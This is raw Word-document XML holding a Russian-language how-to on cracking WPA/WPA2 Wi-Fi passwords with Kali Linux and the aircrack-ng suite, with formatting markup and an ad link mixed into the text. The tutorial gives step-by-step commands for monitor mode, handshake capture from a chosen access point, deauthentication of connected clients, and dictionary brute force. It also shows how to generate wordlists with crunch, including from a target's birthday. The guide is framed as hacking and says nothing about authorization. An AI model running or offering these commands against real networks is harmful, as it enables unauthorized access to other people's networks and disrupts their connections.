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9" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="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Взлом Wi-Fi сетей, Aircrack-ng, Kali Linux.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75" w:afterAutospacing="0" w:line="11" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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WPA/WPA2.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WPA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и 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WPA2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(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Wi-Fi Protected Access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) собственно это протокол авторизации и шифрования данных в Wi-Fi сетях. На данный момент это самый популярный,  самый надежный протокол. Часто в домашних условиях и маленьких сетях используют   WPA2-PSK(Pre-Shared Key). В начале 2018 года международный альянс Wi-Fi Alliance анонсировал новейший протокол беспроводной безопасности — WPA3.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Основной и самый популярный метод атаки на этот протокол является брутфорс(метод грубой силы, перебор паролей).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75" w:afterAutospacing="0" w:line="11" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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handshake.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Для того, чтобы устройство получило маркер доступа в сеть, на устройстве необходимо ввести специальную парольную фразу, называемую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Pre-Shared Key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. Длина должна быть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от 8 до 32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символов, притом можно использовать специальные символы, а также символы национальных алфавитов. После ввода парольной фразы она помещается в специальный пакет ассоциации (пакет обмена ключами, handshake), который передается на точку доступа. Если парольная фраза верна, то устройству выдается маркер доступа в сеть.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Уязвимостью является возможность перехвата пакетов handshake, в которых передается Pre-Shared Key при подключении устройства к сети. По скольку Pre-Shared key шифруется, у злоумышленника остается только одна возможность – атака грубой силой на захваченные пакеты.   Также стоит обратить внимание, что для того, чтобы перехватить handshake злоумышленнику совсем не обязательно ждать того момента, как к сети будет подключено новое устройство. На некоторых беспроводных адаптерах, при использовании нестандартных драйверов, есть возможность посылки в сеть пакетов, которые будут прерывать сетевые соединения и инициировать новый обмен ключами в сети между клиентами и точкой доступа. В таком случае, для того, чтобы захватить требуемые пакеты, необходимо, чтобы к сети был подключен хотя бы один клиент.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75" w:afterAutospacing="0" w:line="11" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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Взлом.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 наших примеров я использую </w:t>
      </w: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E54E5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E54E5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instrText xml:space="preserve"> HYPERLINK "https://www.kali.org/" \t "/home/dima/Документы\\x/_blank" </w:instrText>
      </w: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E54E5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E54E5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 Kali Linux</w:t>
      </w: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E54E5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(Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность). И пакет уже установленных программ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E54E5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E54E5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instrText xml:space="preserve"> HYPERLINK "http://www.aircrack-ng.org/" \t "/home/dima/Документы\\x/_blank"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E54E5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E54E5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 Airocrack-ng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E54E53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(Это полный набор инструментов для оценки безопасности сети Wi-Fi.)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Первым этапом нам надо перевести наш Wi-Fi адаптер в режим мониторинга. То есть чип адаптера переводиться в режим прослушивания эфира. Все пакеты которые отсылают друг другу в округе.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Сначала мы убьем все процессы которые используют Wi-Fi интерфейс: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airmon-ng check kill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Запустите беспроводной интерфейс в режиме мониторинга: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airmon-ng start wlan0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 результате у вас появиться новый интерфейс </w:t>
      </w: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wlan0mon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с ним дальше мы и будем работать (посмотреть доступные интерфейсы можно командой </w:t>
      </w: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ifconfig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). Теперь мы можем посмотреть что же происходит вокруг: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airodump-ng wlan0mon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" w:afterAutospacing="0"/>
        <w:ind w:left="15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BSSID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— MAC адрес WI-Fi точки.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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PWR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— Сила сигнала.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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Beacons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— Фрейм Бикон (Beacon frame) /Точка доступа WiFi периодически отправляет Биконы для анонсирования своего присутствия и предоставления необходимой информации (SSID, частотный канал, временные маркеры для синхронизации устройств по времени, поддерживаемые скорости, возможности обеспечения QoS и т.п.) всем устройствам в зоне ее покрытия. Радиокарты пользовательских устройств периодически сканируют все каналы 802.11 и слушают биконы, как основу для выбора лучшей точки доступа для ассоциации. Пользовательские устройства обычно не посылают биконы, за исключением ситуации, когда выполняется процедура участия в IBSS (Independent Basic Service Set) или, по другому, в одноранговом соединении типа Ad-hoc.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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CH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— Номер канала точки доступа.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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ENC-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Используемый алгоритм. OPN = нет шифрования, «WEP?» = WEP или выше (недостаточно данных для выбора между WEP и WPA/WPA2), WEP (без знака вопроса) показывает статичный или динамичный WEP, и WPA или WPA2 если представлены TKIP или CCMP или MGT.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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CIPHER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— Обнаруженный шифр. Один из CCMP, WRAP, TKIP, WEP, WEP40, или WEP104. Не обязательно, но обычно TKIP используется с WPA, а CCMP обычно используется с WPA2. WEP40 показывается когда индекс ключа больше 0. Стандартные состояния: индекс может быть 0-3 для 40 бит и должен быть 0 для 104 бит.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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AUTH —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Используемый протокол аутентификации. Один из MGT (WPA/WPA2 используя отдельный сервер аутентификации), SKA (общий ключ для WEP), PSK (предварительно согласованный ключ для WPA/WPA2) или OPN (открытый для WEP).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" w:afterAutospacing="0"/>
        <w:ind w:left="15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ESSID —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Так называемый SSID, который может быть пустым, если активировано сокрытие SSID. В этом случае airodump-ng попробует восстановить SSID из зондирующих запросов ассоциирования.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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STATION —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MAC адрес каждой ассоциированной клиента подключенного к точке доступа. Клиенты, в настоящий момент не ассоциированные с точкой доступа, имеют BSSID «(not associated)».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38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Можете немного поиграться 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38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airodump-ng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="FF66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—manufacturer —uptime</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="FF66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—wps</w:t>
      </w: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wlan0mon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Запускаем airodump-ng для беспроводного интерфейса </w:t>
      </w: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u w:val="single"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>wlan0mon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, кроме основной информации мы задаём отображать производителя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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(—manufacturer)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, время работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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(—uptime)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и информацию о WPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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(—wps)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Теперь нам надо перехватить  </w:t>
      </w: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handshake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какой либо точки доступа, желательно конечно к которой подключены клиенты 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6600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airodump-ng -c 1 —bssid C0:4A:00:F0:F4:24  -w WPA wlan0mon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-c  &lt;номер&gt;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номер канал.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—bssid &lt;MAC&gt;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мас адрес точки доступа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-w &lt;имя или путь/имя&gt;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файл в который будут сохранены все перехваченные пакты.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wlan0mon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Название беспроводного интерфейса интерфейса.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После удачного захвата рукопожатий в правом углу будет надпись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WPA handshake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Кстати мы можем попытаться ускорить процесс , заставив клиента переподключиться к точки доступа :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aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon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—deauth &lt;число сообщений&gt;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— отправка запроса  деаунтифицировать. (0 не ограниченное число пакетов)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-a &lt;MAC&gt;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— Мас адрес точки доступа.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-с &lt;MAC&gt; —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Мас адрес клиента.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wlan0mon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— интерфейс.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Другие виды атак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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>       --fakeauth    задержка : фальшивая аутентификация с ТД (-1)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --interactive       : интерактивный выбор фреймов (-2)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --arpreplay         : стандартная повторная отправка запросов ARP (-3)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --chopchop          : расшифровать/порубить WEP пакет (-4)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --fragment          : сгенерировать валидный поток ключей   (-5)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --caffe-latte       : запросить клиента на новые IVs  (-6)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --cfrag             : фрагментирование в отношении клиента  (-7)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --migmode           : атаки режим миграции WPA  (-8)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1"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="andale mono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2F2F2"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      --test              : тест возможности инжекта и качества соединения (-9).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eastAsia="Arial" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="36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/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="36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an.yandex.ru/count/WymejI_zO9O35Hu093HmAJO5Fqjz60K0bWGng-E7OW00000urkieG0n80c2C66W4SC3T_B-ko9-9w0600Sxd_mI80Q_ai0-G0SJsoQRQW8200fW1nFR9fbgm0QZIlAu8k07EqjZ89C010jW1nDMKfW7W0OZFomte0Q82-07219W2mCFY3w02m83Y2Ra2N8Jc4Qd1Ez_m0iICkvOBa0su1Fy1Y0MAEf05ztAm1U8Ek0MS7S05w5_81QuOq0MLIeUgSbqx9Kwf1mxi_9eJI_Sbk0U01GJG29gAW872a846u0YWWF44w0a7y0c07lW9y1202Wh92ZoUL2p1CVC_2AeB4AyLjRuEx0007cMw0NRVw0ltSl0B1eWCgCNUlW7e39y6c0sVd4dW3OA2WO60W808FygEgfNNwywIJg0Em8GzZjZpYRhYqlibk0yZW13huCCTa125tlsMc9_sbkwG9D0GzW6O4Scz8w4HPxJthRiCu16mkVi1w16Yde23fRt2s5Bf4WQu_0ZFTfG4y18AY1C1c1C8g1F3YkJfxT2cznRW4vmTW1IWW62859hhvwtiwlABf06W59mTg1JtSWUpmvwK1k0K0UWKZ0BG5RF3dfG6s1N1YlRieu-y_6Fmc1QGt_sJ1g0Ma8wOb0Qe5kW7i1Rx1iaMq1QenTw-0TWMWHUO5yM6cm-e5mcu5mZ05xQM0TWNm8Gzw1S1e1WBi1YhfP-K1hWO0T0O3_WOki6_pD68vC4yW1c7-TQxqDFPx1s96U_ge1cg0x0Pk1d0qXaIUM5YSrzpPN9sPN8lSZOsD2qqu1a1w1da1V0PWC83WHh__riewmOmw8WQm8Gza1g019WQyS2q0R0QvEU9YxZqhU1kzHe10000-1gVd4cO6_-XGx0RORWR1EaR0000OD3FXK7m6ut0vLNu6vAXmmA270rcE4CwSJ54Qdb7K5etwHm0y3-07Vz_cHq0y3-X7MvAw2ivSCm_g1q1u1t7aP47c1wJ-mse7W7G7iBoyy-oixkLr07O7hED7uWV_m6W7-BeiYEm7zG2o1_YgefJqXy6DJWpDpWrsHy0000WLJM5GU0V_TUrK-WVvzl30l0V0VWV0O0W0eWW0R0WW8200TWW_m7W804c8B44nXXZ110n2J5m0mKa1WXs2LAZqCwGtTP28G28OQbhC6ze602aLNnBA131coqlATf3Z-PyLzp9Ue_UyWtuC_8XtHuWH9K8FMlhg-_nBN4ML-QREexoVn10txq7oIttGyFcnbPt0l2v4Qxk47OE_2Ft50niEZ0xVEd3OmO0~1" \t "/home/dima/Документы\\x/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="36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0"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="36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РЕКЛАМА</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="36"/>
          <w:kern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Теперь нам надо расшифровать его и узнать PSK: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aircrack-ng -w wordlist.dic -b C0:4A:00:F0:F4:24  WPA.cap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-w &lt;путь/файл словаря&gt;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— Указываем словарь для перебора паролей.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-b &lt;MAC&gt;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 — Мас адрес точки доступа.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WPA.cap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— Файл с  handshake.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75" w:afterAutospacing="0" w:line="11" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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Создание своих словарей.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При атаках типа брутфорс словари играют очень важную роль. Я думаю вы с легкость найдете в интернете куча всяких не понятных словарей. Но еще можно и нужно  делать самому.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Для этого в дистрибутиве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Kali Linux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есть интересная утилита, называется </w:t>
      </w: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Crunch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. Синтаксис ее довольно прост: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" w:afterAutospacing="0"/>
        <w:ind w:left="15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min =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минимальная длина пароля;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" w:afterAutospacing="0"/>
        <w:ind w:left="15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max =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максимальная длина;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" w:afterAutospacing="0"/>
        <w:ind w:left="15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characterset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= символы, которые будут использоваться для генерации паролей;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" w:afterAutospacing="0"/>
        <w:ind w:left="15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-t &lt;pattern&gt; =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возможность создавать паттерны. Давай на примере. Скажем, ты знаешь, что у человека день рождения 28 июля и эти цифры есть в пароле вида 0728, но перед этим числом есть еще какие-то символы. Поэтому ты пишешь что-то вроде @@@@@@@0728, и получается, что лист будет сгенерирован на 11 -значный пароль. Семь символов, которые будут генериться, а четыре будут фиксированными. По мне, так весьма крутая и удобная фишка;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" w:afterAutospacing="0"/>
        <w:ind w:left="15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-о &lt;outputfile&gt; =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выходной файл для нашего листа.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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-p =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перестановка.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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-d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— ограничение числа последовательно одинаковых символов.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crunch 4 8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Как сам понимаешь, кранч будет генерить пароли от 4 до 8 символов. Как видишь, ничего сложного, теперь давай что-нибудь поинтереснее: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crunch 6 8 1234567890 -о /гооt/wordlist.txt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Здесь будет сгенерирован словарь от 6 до 8 символов, в пароле только цифры и зальются они во внешний файл, что мы указали. Остается только воспользоваться получившимся словарем.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FF66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crunch 1 1 -p Alex Company Position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Словарь состоит из всех возможных комбинаций слов Alex, Company и Position.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Для тега </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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-t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есть шаблоны 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" w:afterAutospacing="0"/>
        <w:ind w:left="15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^ — спецсимволы.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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@ — буквы в нижнем регистре.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" w:afterAutospacing="0"/>
        <w:ind w:left="15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, — буквы в верхнем регистре.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8" w:afterAutospacing="0"/>
        <w:ind w:left="150" w:right="0" w:hanging="360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% — цифры.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2" name="Текстовое поле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FgAAAGRycy9QSwECFAAUAAAACACHTuJAs0lY7tAAAAAFAQAA&#10;DwAAAAAAAAABACAAAAA4AAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQNQjZ17vAgAA&#10;OAYAAA4AAAAAAAAAAQAgAAAANQEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAJY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E6B7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3FE6B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7F1EF8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7F1EF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B54B52A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB54B5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3F72696"/>
    <w:rsid w:val="4A1947CF"/>
    <w:rsid w:val="FFD4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Strong"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13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4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9">
    <w:name w:val="_Style 13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20">
    <w:name w:val="_Style 14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cp:lastModifiedBy>dima</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-20T22:03:32Z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1049-11.1.0.10702</vt:lpwstr>
  </property>
</Properties>
</file>